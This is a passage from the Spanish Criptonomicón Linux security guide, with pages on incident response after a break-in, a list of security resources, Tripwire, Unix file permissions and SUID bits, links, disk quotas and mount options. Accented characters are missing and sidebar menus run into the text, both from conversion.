Es habitual que durante los prximos minutos el atacante vuelva a intentar continuar
con sus acciones, tal vez usando una cuenta diferente y/o una direccin de red
distinta.

El ataque ha concluido
Ha detectado un compromiso que ya ha ocurrido o bien lo ha detectado mientras
ocurra y ha echado al atacante fuera de su sistema.
Ahora viene la parte ms dura del incidente: tratar de dejar el sistema mejor que
estaba antes de que ocurriera.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/ruptura.html (2 of 4) [25/10/2000 02:34:28 p.m.]

Qu hacer en caso de Ruptura?

Tapar el agujero
Determine los medios que us el atacante para acceder a su sistema. Deber analizar
cuidadosamente los ficheros de registro del sistema. En ellos debera haber una
informacin valiosa para seguir la pista de las actividades del intruso en nuestra
mquina. Las causas ms habituales son una mala configuracin de algn servicio,
un programa defectuoso o la negligencia de algn usuario con respecto a su clave de
acceso.
Compruebe por los cauces ms conocidos, que se pueden consultar en la pgina
sobre recursos de seguridad bajo Linux, la existencia de algn nuevo exploit que
pueda ser la causa u otros fallos que tenga que corregir.
Si no elimina al atacante, probablemente volver. No slo a su mquina, sino a
cualquiera otra de la red. Durante sus incursiones ha podido utilizar algn sniffer,
y disponer de informacin suficiente para tener acceso a otras mquinas locales.
Si sospecha que el atacante ha obtenido copias de los ficheros /etc/passwd,
/etc/shadow, /etc/ppp/pap-secrets, /etc/ppp/chap-secrets o cualquier otro fichero que
contenga datos de usuarios y claves, sera conveniente modificarlas todas. Si tiene
distintos usuarios en su mquna, oblgueles a cambir su clave. En general es
preferible cambiar siempre las claves despues de un incidente, una vez que sepamos
que lo hacemos de una forma segura.
Verifique si se han modificado las limitaciones al acceso a distintas herramientas de
administracin remota como linuxconf. Puede que el atacante trate de abrir alguna
puerta trasera para continuar aprovechndose de nuestras mquinas.
En algunos casos puede interesar antes de nada, hacer alguna copia de todo el disco
duro para seguir investigando el incidente en otra mquina distinta que no est
conectada a la red y no perder una informacin que puede ser valiosa.

Evaluacin de los efectos del ataque


El siguiente paso que hay que realizar es la evaluacin de los efectos que ha tenido el
ataque. Tiene que tener en mente la naturaleza del ataque para evaluar los efectos. Si
ha sido una denegacin de servicio es probable que el atacante no haya tenido acceso
a la informacin local. Si tena instalado algn programa, estilo Tripwire, que
verifica la integridad, su trabajo ahora sera ms cmodo. En caso contrario tendr
que verificar todos sus datos importantes. Verifique las fechas de creacin de los
ficheros binarios y si detecta alguna incongruencia con la fecha de instalacin puede
empezar a sospechar. Si tiene la posibilidad, compare los tamaos de los ficheros con
otro sistema limpio y por supuesto, no trate de verificar los programas
ejecutndolos como root.
Unas buena alternativa es volver a instalar el sistema. Guarde los ficheros de
configuracin para tener una funcionalidad idntica a la previa al ataque. En Linux,
los ficheros de configuracin se almacenan en modo texto por lo que no son

file:///C|/TEMP/criptonomicon/criptonomicon/linux/ruptura.html (3 of 4) [25/10/2000 02:34:28 p.m.]

Qu hacer en caso de Ruptura?

susceptibles de contener caballos de Troya. Eso s, debera verificar que las


configuraciones son las originales y no han sido manipuladas por el atacante.
Reinstale el sistema y utilice las copias de seguridad para reponer los datos de los
usuarios.
Hay que tener especial cuidado con las copias de seguridad. Tiene que estar seguro
de que las copias de seguridad que est utilizando son previas a cualquier ataque. No
se arriesgue a restaurar unas copias de seguridad que pudieran tener algn caballo de
Troya; tenga un cuidado especial con los ficheros binarios que restaura.

Avisar
Si cree que ha sido objeto de un ataque que no est documentado, debera notificarlo
a alguna organizacin de seguridad como CERT o similar para que se pueda
solucionar lo antes posible y evitar que otros sistemas lo puedan padecer.
Y aunque sea un hecho documentado con anterioridad, no dude en pedir consulta a
alguna de la mltiples lista de correo que tratan temas de seguridad en general y de
Linux en particular. En Espaa resulta especialmente recomendada la lista
CERT-ES de RedIris.
Si ha conseguido informacin sobre el atacante, se lo debera notificar al
administrador del dominio del intruso. Puede buscar este contacto con whois, con la
base de datos del Internic o en RedIris. Podra enviarles un mensaje de correo con
todos los registros relacionados con el incidente, fechas y horas. Si conoce alguna
otra informacin sobre su intruso, podra mencionarla tambin. En ciertas
situaciones, tras enviar el correo podra llamar por telfono al administrador del
sistema que origin el incidente. Si el admininistrador localiza a su atacante, podra
hacerle las cosas mucho ms fciles.
Los buenos hackers con frecuencia usan sistemas intermedios. Algunos (o muchos)
puede que ni sepan que han sido comprometidos. Intentar seguir la pista de un
cracker hasta su origen puede ser difcil. Siendo educado con los administradores, le
puede facilitar la obtencin de la ayuda necesaria.
De todas formas, esperamos que la lectura de este captulo sea totalmente
innecesaria, si ha seguido unas normas adecuadas de seguridad.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/ruptura.html (4 of 4) [25/10/2000 02:34:28 p.m.]

Recursos sobre seguridad en Linux

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de

Con esta lista de recursos perseguimos dos objetivos fundamentales, tener una buena
gua para saber dnde consultar y obtener informacin, y por otro lado, obtener la
informacin sobre las novedades que van ocurriendo, nuevos fallos descubiertos, los
exploits que aparecen y los mecanismos para poderlos solucionar.
En SeguriNet se puede encontrar una traduccin en castellano de la Gua de
Seguridad del Administrador de Linux. En ella tenemos una documentacin valiosa
donde completar aspectos ms concretos, as como una buena lista de recursos.

Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la

Por otro lado en CICA tenemos la mejor lista de correo sobre seguridad en castellano
que hay sobre linux. No es un foro de discusin, no est pensada para realizar
consultas, sino para recibir de forma rpida y clara todos los avisos sobre nuevas
vulnerabilidades que se detectan en Linux, los efectos que pueden tener y cmo se
pueden solucionar. No queremos desaprovechar la oportunidad de agradecerles el
trabajo que realizan. Podis suscribiros en su pgina de suscripcin a
sec-linux@ls.cica.es. CICA cuenta adems con otra informacin interesante que
merece la pena consultar.

Seguridad
Qu hacer en caso de

En las pginas del GLUB hay una buena recopilacin de software y documentacin
de seguridad en Linux en castellano.

Ruptura?

Recursos

RedIris es otro lugar que tambin dispone de informacin valiosa y listas sobre
seguridad y Linux.

Recursos Web y ftp


Distribuciones

Caldera OpenLinux

RedHat

Gua de errores de RedHat

Lista de archivos de seguridad de RedHat

SuSE

Listas de correo de SuSE

Debian

Slackware

Frum Slackware

file:///C|/TEMP/criptonomicon/criptonomicon/linux/recursos.html (1 of 6) [25/10/2000 02:34:29 p.m.]

Recursos sobre seguridad en Linux

TurboLinux

Stampede GNU/Linux

Mandrake

LinuxPPC

Linux Pro

LinuxWare

MKLinux

Yggdrasil

Connectiva

DLD

Pacific HiTech TurboLinux Errata Guide

Eagle Linux M68K

Eurielec

Kheops Linux

MNIS Linux

Trinux (una minidistribucin enfocada hacia la seguridad)

Red / Anlisis de Host / Intrusion

nmap

ftpcheck, relaycheck

cheops

nessus

saint

SBScan

Samba scanner (funciona con windows)

HUNT

SATAN y otras herramientas

Administracin

rpm

Guiones de actualizacin RedHat RPM

Logcheck

bgcheck

file:///C|/TEMP/criptonomicon/criptonomicon/linux/recursos.html (2 of 6) [25/10/2000 02:34:29 p.m.]

Recursos sobre seguridad en Linux

COAS

Webmin

Linuxconf

super

YaST

Cortafuegos

ipchains configuracin ms fcil

Configuracin de un cortafuegos mediante un CGI

ipchains y otros

Servicios de Red

sendmail

apache

BIND/DHCPD/DHCPCD

secure syslog

openssl

ncftp, ncdftp

qmail

postfix

ProFTPD

rsync

PPP

Servicios de internet

versin libre de LDAP

Lenguaje de programacin para generar HTML dinmico

Soluciones para Redes Virtuales Privadas

CIPE

ECLiPt

Productos hardware RedCreek VPN (IPSec)

Controladores de tarjetas RedCreek VPN para Linux

Desarrollo PPTP para Linux

FreeS/WAN, un desarrollo IPSec para Linux

file:///C|/TEMP/criptonomicon/criptonomicon/linux/recursos.html (3 of 6) [25/10/2000 02:34:29 p.m.]

Recursos sobre seguridad en Linux

SSL

SSLeay

Desarrollo open SSL

Aplicaciones para SSL

Ftp oficial

Desarrollo Apache SSL libre

Servicios/Cifrado de datos

Desarrollo libre de SSH

Sustituto libre de PGP

CFS

Herramientas de Seguridad

audit

Varios paquetes de software de seguridad

Kernel

stackguard

rule based access control

Deteccin de intrusos

port sentry

host sentry

Network Flight Recorder

Grupos de respuestas sobre seguridad

USA - CERT

Informacin sobre seguridad en castellano

INTERNATIONAL - HERT

AUSTRALIA - AUSCERT

SINGAPORE - SINGCERT

Winn Schwartau's site

file:///C|/TEMP/criptonomicon/criptonomicon/linux/recursos.html (4 of 6) [25/10/2000 02:34:29 p.m.]

Recursos sobre seguridad en Linux

L0pht

Root Shell

Infowar UK

buenos documentos

Programas comerciales para copias de seguridad

BRU

Quickstart
Arkeia

CTAR

CTAR:NET

Backup Professional

Aplicaciones

Pgina de actualizacin diaria y bsqueda

Prcticamente todos los paquete RPM

Un gran listado de aplicaciones

Varios

Security and Encryption: Probablemente la mejor lista de recursos sobre


seguridad en internet. Aqu podr encontrar casi todo y algo ms.
Replay tiene archivos de muchos programas de seguridad.

Wietse's

Ftp de ES-CERT

The Hacker FA

Bugtraq

First

Hacking

CPSR

Underground

Defcon

El archivo COAST tiene un gran nmero de programas de seguridad Unix e


informacin.
Reptile tiene montones de buena informacin sobre seguridad en sus pginas.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/recursos.html (5 of 6) [25/10/2000 02:34:29 p.m.]

Recursos sobre seguridad en Linux

Infilsec tiene un motor de vulnerabilidad que puede decirle cuales afectan a


una plataforma especfica.
CIAC envis peridicos de seguridad sobre exploits comunes.
Un buen buen punto de inicio para Linux Pluggable Authentication Modules
(PAM).

Listas de correo

Bugtraq: Para suscribirse a bugtraq, enve un mail a listserv@netspace.org que


contenga en el cuerpo del mensaje subscribe bugtraq. (ver el enlace anterior
para los archivos).
CIAC: Enve un e-mail a: majordomo@tholia.llnl.gov
En el cuerpo (no en el subject) del mensaje ponga: subscribe ciac-bulletin.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/recursos.html (6 of 6) [25/10/2000 02:34:29 p.m.]

Seguridad del Sistema de Archivos - Tripwire

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Verificar la integridad con Tripwire


Una forma cmoda de detectar ataques locales (y tambin de red)
en su sistema es ejecutar un programa que verifique la integridad
de la informacin almacenada en los ficheros, tal como Tripwire.
El programa Tripwire ejecuta varios cheksums de todos los
binarios importantes y ficheros de configuracin y los compara
con una base de datos con valores de referencia aceptados como
buenos. As se detecta cualquier cambio en los ficheros.

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Es buena idea instalar tripwire en un disquete y protegerlo


fsicamente. De esta forma no se puede alterar tripwire o
modificar su base de datos. Una vez que tripwire se ha
configurado, es buena idea ejecutarlo como parte de de los
deberes habituales de administracin para ver si algo ha
cambiado.

Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas

Incluso puede aadir una entrada a crontab para ejecutar tripwire desde su disquete
todas las noches y enviar por correo los resultados y verlos por la maana, algo como
esto:
MAILTO=gonzalo
15 05 * * * root /usr/local/bin/tripwire
que le enviar por correo un informe cada maana a las 5:15 am.
Tripwire puede ser una de la mejores herramientas para detectar intrusos antes de que
tenga otro tipo de noticias de ellos. Como son muchos los ficheros que se modifican
en su sistema, debera tener cuidado para discernir lo que es la actividad de un
cracker y lo que es la activiadad normal del sistema.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/tripwire.html [25/10/2000 02:34:29 p.m.]

Seguridad del Sistema de Archivos - El rbol de directorios

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

El rbol de directorios
Para quienes no estn familiarizados con las caractersticas del
sistema de almacenamiento de informacin en sistemas Unix, hay
que indicar que se organizan en un nico rbol de directorios.
Cada soporte, disco, particin, disquete o CD tiene su propia
organizacin lgica, un sistema de ficheros. Para poder usar uno
de estos soportes tenemos que "montarlo" en un directorio
existente. El contenido de la particin nos aparecer como el
contenido del directorio.

Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire

Limitar el espacio
Un primer criterio para mantener un sistema seguro sera hacer
una correcta distribucin del espacio de almacenamiento. Esto
Normas prcticas
limita el riesgo de que el deterioro de una particin afecte a todo
el sistema. La prdida se limitara al contenido de esa particin.
No hay unas normas generales aplicables; el uso al que vaya destinado el sistema y la
experiencia son las bases de la decisin adecuada, aunque s podemos dar algn
consejo:
Si el sistema va a dar servicio a mltiples usuarios que requieren
almacenamiento para sus datos privados, sera conveniente que el directorio
/home tuviera su propia particin.
Si el equipo va a ser un servidor de correo, impresin, etc., el directorio /var
o incluso /var/spool podran tener su propia particin.
Algunos directorios son necesarios en la particin raz. Contienen datos que
son necesarios durante el proceso de arranque del sistema. Son /dev/, /etc,
/bin, /sbin, /lib, /boot.
El directorio /usr/local contiene los programas compilados e instalados
por el administrador. Resulta conveniente usar una particin propia para
proteger estos programas personalizados de futuras actualizaciones del
sistema. Este criterio tambin se puede aplicar al directorio /opt.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/arboldirectorios.html (1 of 2) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - El rbol de directorios


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/arboldirectorios.html (2 of 2) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - Permisos

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Permisos
Linux, como sistema multiusuario, asigna un propietario y un
grupo a cada fichero (y directorio) y unos permisos al propietario,
al grupo y al resto de los usuarios. La forma ms rpida de
comprobar esta caracterstica es usar el comando ls -la. As
nos aparece el tipo de fichero, el propietario, el grupo, los
permisos e informacin adicional. Por supuesto, el sistema de
ficheros tiene que admitir esta caracterstica, como es el caso del
sistema de ficheros ext2 (Linux nativo). En los sistemas de
ficheros pensados para entornos monousario, como msdos o vfat,
no tenemos esta caracterstica, por lo que son inseguros y su uso
no es aconsejable bajo Linux.

Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas

Es conveniente tener claros los permisos que se pueden asignar a


un fichero o directorio. Puede que algunas aplicaciones no funcionen bien si algn
fichero no tiene el permiso o el propietario correctos, bien por falta de permisos o
bien por exceso. Algunas aplicaciones son un poco quisquillosas en este aspecto. Por
ejemplo, fetchmail es un programa que podemos usar para recoger el correo de un
servidor pop (por ejemplo). Este programa se configura en el fichero
.fetchmailrc, donde tendremos que indicar la clave que usamos en el servidor;
pues bien, si este fichero tiene permiso de lectura para otro usuario que no sea el
propietario, fetchmail no funcionar.
Otras aplicaciones, como por ejemplo inn (un servidor de noticias de Internet)
tampoco funcionar si el propietario de sus ficheros es otro usuario distinto a news.
Todo esto est perfectamente documentado en cada uno de los programas, por lo que
es conveniente leer la documentacin que aporta y las pginas del manual.

Permisos de ficheros y directorios


Como decamos anteriormente, tenemos que asegurarnos de que los ficheros del
sistema y los de cada usuario slo son accesibles por quienes tienen que hacerlo y de
la forma que deben. No slo hay que protegerse de ataques o miradas indiscretas,
tambin hay que protegerse de acciones accidentales.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/permisos.html (1 of 5) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - Permisos

En general, cualquier sistema UNIX divide el control de acceso a ficheros y


directorios en tres elementos: propietario, grupo y otros. Tanto el
propietario como el grupo sn nicos para cada fichero o directorio. Eso s, a un
grupo pueden pertenecer mltiples usuarios. Otros hace referencia a los usuarios
que ni son el propietario ni pertenecen al grupo.
Todas estas caractersticas se almacenan en el sistema de ficheros, en particular en un
i-nodo, que es un elemento que describe las caractersticas de un fichero en disco
(salvo su nombre).
Una rpida explicacin de los permisos Unix:
Propiedad:
Qu usuario y grupo posee el control de los permisos del i-nodo. Se almacenan
como dos valores numricos, el uid (user id) y gid (group id).
Permisos:
Bits individuales que definen el acceso a un fichero o directorio. Los permisos
para directorio tienen un sentido diferente a los permisos para ficheros. Ms
abajo se explican algunas diferencias.
Lectura (r):
Fichero: Poder acceder a los contenidos de un fichero
Directorio: Poder leer un directorio, ver qu ficheros contiene
Escritura (w):
Fichero: Poder modificar o aadir contenido a un fichero
Directorio: Poder borrar o mover ficheros en un directorio
Ejecucin(x):
Fichero: Poder ejecutar un programa binario o guion de shell
Directorio: Poder entrar en un directorio
Estos permisos se pueden aplicar a:
usuario (u): El propietario del fichero
grupo (g): El grupo al que pertenece el fichero
otros (o): El resto de los usuarios del sistema
Nota:
Tenga mucho cuidado con aquellos directorios que tengan permiso de
escritura. Cualquiera podra borrar un fichero, aunque no sea de su propiedad y
esto puede ser un riesgo, tanto para el sistema como para los datos de los
usuarios.
Adems tenemos otros bits de permisos que no podemos pasar por alto cuando
estamos tratando de temas de seguridad.
Sticky bit:
El sticky bit tiene su significado propio cuando se aplica a directorios. Si el
sticky bit est activo en un directorio, entonces un usuario slo puede borrar
file:///C|/TEMP/criptonomicon/criptonomicon/linux/permisos.html (2 of 5) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - Permisos

ficheros que son de su propiedad o para los que tiene permiso explcito de
escritura, incluso cuando tiene acceso de escritura al directorio. Esto est
pensado para directorios como /tmp, que tienen permiso de escritura global,
pero no es deseable permitir a cualquier usuario borrar los ficheros que quiera.
El sticky bit aparece como 't' en los listados largos de directorios.
drwxrwxrwt 19 root root 8192 Jun 24 14:40
tmp
Attributo SUID: (Para Ficheros)
Este bit describe permisos al identificador de usuario del fichero. Cuando el
modo de acceso de ID de usuario est activo en los permisos del propietario, y
ese fichero es ejecutable, los procesos que lo ejecutan obtienen acceso a los
recursos del sistema basados en el usuario que crea el proceso (no el usuario
que lo lanza). Por ejemplo /usr/bin/passwd es un ejecutable propiedad de root
y con el bit SUID activo. Por qu? Este programa lo puede usar cualquier
usuario para modificar su clave de acceso, que se almacena en
-rw-r--r-- 1 root root 1265 Jun 22 17:35 /etc/passwd
pero segn los permisos que observamos en este fichero, slo root puede escribir y
modificar en l. Entonces sera imposible que un usuario pudiera cambiar su clave si
no puede modificar este fichero. La solucin para este problema consiste en activar el
bit SUID para este fichero:
-r-s--x--x 1 root root 10704 Apr 14 23:21 /usr/bin/passwd
de forma que cuando se ejecute, el proceso generado por l es un proceso propiedad
de root con todos los privilegios que ello acarrea.
Piensa que esto puede ser un riesgo para la seguridad? Efectivamente lo podra ser
si no mantenemos un mnimo de atencin, ya que en este tipo de programas se
pueden producir desbordamientos de bfer que comprometan su sistema. Recuerde
siempre lo siguiente:
No asignar el bit SUID salvo cuando sea estrictamente necesario.
Comprobar que cualquier programa con est bit activo no tiene ningn
desbordamiento de buffer (conocido).
No asignarlo jams si el programa permite salir a la shell.
Atributo SGID: (Para ficheros)
Si est activo en los permisos de grupo, este bit controla el estado de "poner id
de grupo" de un fichero. Acta de la misma forma que SUID, salvo que afecta
al grupo. El fichero tiene que ser ejecutable para que esto tenga algn efecto.
Atributo SGID: (Para directorios)
Si activa el bit SGID en un directorio ( con "chmod g+s directorio"), los
ficheros creados en ese directorio tendrn puesto su grupo como el grupo del
directorio.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/permisos.html (3 of 5) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - Permisos

A continuacin se describen los significados de los permisos de acceso individuales


para un fichero. Normalmente un fichero tendr una combinacin de los siguientes
permisos:
-r-------- Permite acceso de lectura al propietario
--w------- Permite modificar o borrar el fichero al
propietario
---x------ Permite ejecutar este programa al propietario,
(los guiones de shell tambin requieren permisos de
lectura al propietario)
---s------ Se ejecutar con usuario efectivo ID =
propietario
-------s-- Se ejecutar con usuario efectivo ID = grupo
-rw------T No actualiza "instante de ltima
modificacin". Normalmente usado para ficheros de
intercambio (swap)
---t------ No tiene efecto. (antes sticky bit)
A continuacin se describen los significados de los permisos de acceso individuales
para un directorio. Normalmente un directorio tendr una combinacin de los
siguientes permisos:
dr-------- Permite listar el contenido pero no se pueden
leer los atributos.
d--x------ Permite entrar en el directorio y usar en las
rutas de ejecucin completas.
dr-x------ Permite leer los atributos del fichero por el
propietario.
d-wx------ Permite crear/borra ficheros.
d------x-t Previene el borrado de ficheros por otros con
acceso de escritura. Usado en /tmp
d---s--s-- No tiene efecto
Los ficheros de configuracin del sistema (normalmente en /etc) es habitual que
tengan el modo 640 (-rw-r-----), y que sean propiedad del root. Dependiendo
de los requisitos de seguridad del sistema, esto se puede modificar. Nunca deje un
fichero del sistema con permiso de escritura para un grupo o para otros. Algunos
ficheros de configuracin, incluyendo /etc/shadow, slo deberan tener permiso de
lectura por root, y los directorios de /etc no deberan ser accesibles, al menos por
otros.
SUID Shell Scripts
Los scripts de shell SUID son un serio riesgo de seguridad, y por esta razn el
ncleo no los acepta. Sin importar lo seguro que piense que es su script de
shell, puede ser utilizado para que un cracker pueda obtener acceso a una shell
de root.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/permisos.html (4 of 5) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - Permisos

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/permisos.html (5 of 5) [25/10/2000 02:34:30 p.m.]

Seguridad del Sistema de Archivos - Enlaces

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Enlaces
Los sistemas de ficheros de tipo Unix permiten crear enlaces entre
ficheros. Los enlaces pueden ser duros o simblicos.

Introduccin
El rbol de directorios

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad

El primer caso consiste en asignar ms de un nombre a los


mismos datos en disco. Un enlace duro no consume ms espacio
adicional que el que pueda representar el nuevo nombre que le
damos a unos datos y slo es vlido para ficheros que estn en el
mismo sistema de ficheros, es decir, la misma particin. Los
enlaces simblicos son ficheros que apuntan a otro fichero o
directorio. Crean un nuevo fichero pequeo que contiene la ruta
del fichero destino.

Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas

Qu hacer en caso de
Ruptura?

Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/enlaces.html [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Limitar el espacio

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de

Limitar el espacio asignado a los


usuarios

Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Una ataque posible a cualquier sistema es intentar consumir todo


el espacio del disco duro. Una primera proteccin contra este
ataque es separar el rbol de directorios en diversos discos y
particiones. Pero esto puede no ser suficiente y por eso el ncleo
del sistema proporciona la posibilidad de controlar el espacio de
almacenamiento por usuario o grupo.

Introduccin
El rbol de directorios
Permisos
Enlaces

Lo primero que tendramos que hacer es asegurarnos de que


nuestro ncleo tiene soporte para las cuotas de usuarios.
# dmesg | grep quotas
VFS: Diskquotas version dquot_6.4.0
initialized

Tripwire
Limitar el espacio
Normas prcticas

En caso contrario, el ncleo no ha sido compilado con soporte para el sistema de


cuotas para usuarios. En este caso ser necesario compilar un nuevo ncleo Linux.
El resto del procedimiento de instalacin se puede realizar utilizando la
documentacin existente.
Ahora es necesario editar el fichero /etc/fstab y aadir usrquota o
grpquota en la particin o particiones en las que nos interese limitar el espacio de
almacenamiento.
El siguiente ejemplo establece el sistema de cuotas para el uso del directorio /home
montado en la particin /dev/hda3:
/dev/hda3 /home ext2 defaults,usrquota 1 2
Ahora podemos recopilar la informacin de las particiones donde se haya definido el
sistema de cuotas. Podemos usar el comando:
/sbin/quotachek -av
Scanning /dev/hda3 [/home] done

file:///C|/TEMP/criptonomicon/criptonomicon/linux/limitarespacio.html (1 of 3) [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Limitar el espacio

Checked 215 directories and 2056 files


Using quotafile /home/quota.user
Updating in-core user quotas
Al ejecutar este comando tambin se crea un fichero llamado quota.user o
quota.grp en la particin o particiones afectada(s).
# ls -la /home/quota.user
-rw------- 1 root root 16224 Feb 04 14:47
quota.user
Ya est activo el sistema de cuotas y la prxima vez que se inicie el sistema, se
activarn automticamente en todas las particiones que se hayan definido. Ya no ser
necesario volver a ejecutar manualmente este comando, ya que el sistema lo hara de
forma automtica al comprobar y montar cada uno de los sistemas de ficheros desde
el fichero /etc/rc.d/rc.sysinit. El siguiente paso es definir la cuotas para
cada usuario. Para ello existen dos mtodos.
El primero consiste en editar la quota de cada usuario. Por ejemplo, para editar la
cuota del usuario antonio, se ejecuta desde el usuario root el comando:
# edquota -u antonio
Quotas for user antonio:
/dev/hda3: blocks in use:15542,limits
(soft=0,hard=0)
inodes in use: 2139, limits (soft = 0, hard = 0)
El sistema de cuotas de Linux permite limitar el nmero de bloques y el nmero de
i-nodos que un usuario puede tener. Los valores a modificar son los lmites que estn
puestos entre parntesis (que ahora valen 0). Ah se puede especificar cualquier
cantidad (en Kbytes). Por ejemplo, para limitar la cuota de disco del usuario antonio
a 1 Mb, se pondra lo siguiente:
Quotas for user antonio:
/dev/hda7:blocks in use:18542,limits
(soft=1024,hard=1024)
inodes in use: 1139, limits (soft = 0, hard = 0)
El lmite soft es un lmite de aviso y el lmite hard es un lmite insalvable, es decir, el
sistema ya no le asigna ms espacio.
De una forma anloga, podramos modificar la cuota de espacio asignada al grupo
users con:
# edquota -g users

file:///C|/TEMP/criptonomicon/criptonomicon/linux/limitarespacio.html (2 of 3) [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Limitar el espacio


Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/limitarespacio.html (3 of 3) [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de

Normas prcticas para aumentar la


seguridad

Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root

Aunque sea necesario tener claros los conceptos y dedicarle algo


de tiempo a una correcta planificacin, tampoco los pelligros
expuestos tienen por qu asustar a nadie. Todas las distribuciones
de Linux traen unos valores por defecto que son ms que
razonables para cubrir unas necesidades normales.
nosuid, nodev, noexec.

Introduccin
El rbol de directorios
Permisos
Enlaces

Salvo casos excepcionales, no debera haber ninguna razn


Tripwire
para que se permita la ejecucin de programas SUID/SGID
Limitar el espacio
en los directorios home de los usuarios. Esto lo podemos
evitar usando la opcin `nosuid' en el fichero
Normas prcticas
/etc/fstab para las particiones que tengan permiso de
escritura por alguien que no sea el root. Tambin puede ser
til usar `nodev' y `noexec' en las particiones de los directorios
personales de los usuarios y en /var, lo que prohbe la creacin dispositivos
de bloque o carcter y la ejecucin de programas.
Sistemas de ficheros en red

Si exporta sistemas de archivos va NFS, est seguro de configurar


/etc/exports con los accesos lo ms restrictivos posibles. Esto significa
no usar plantillas, no permitir acceso de escritura a root y montar como slo
lectura siempre que sea posible.
umask

Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

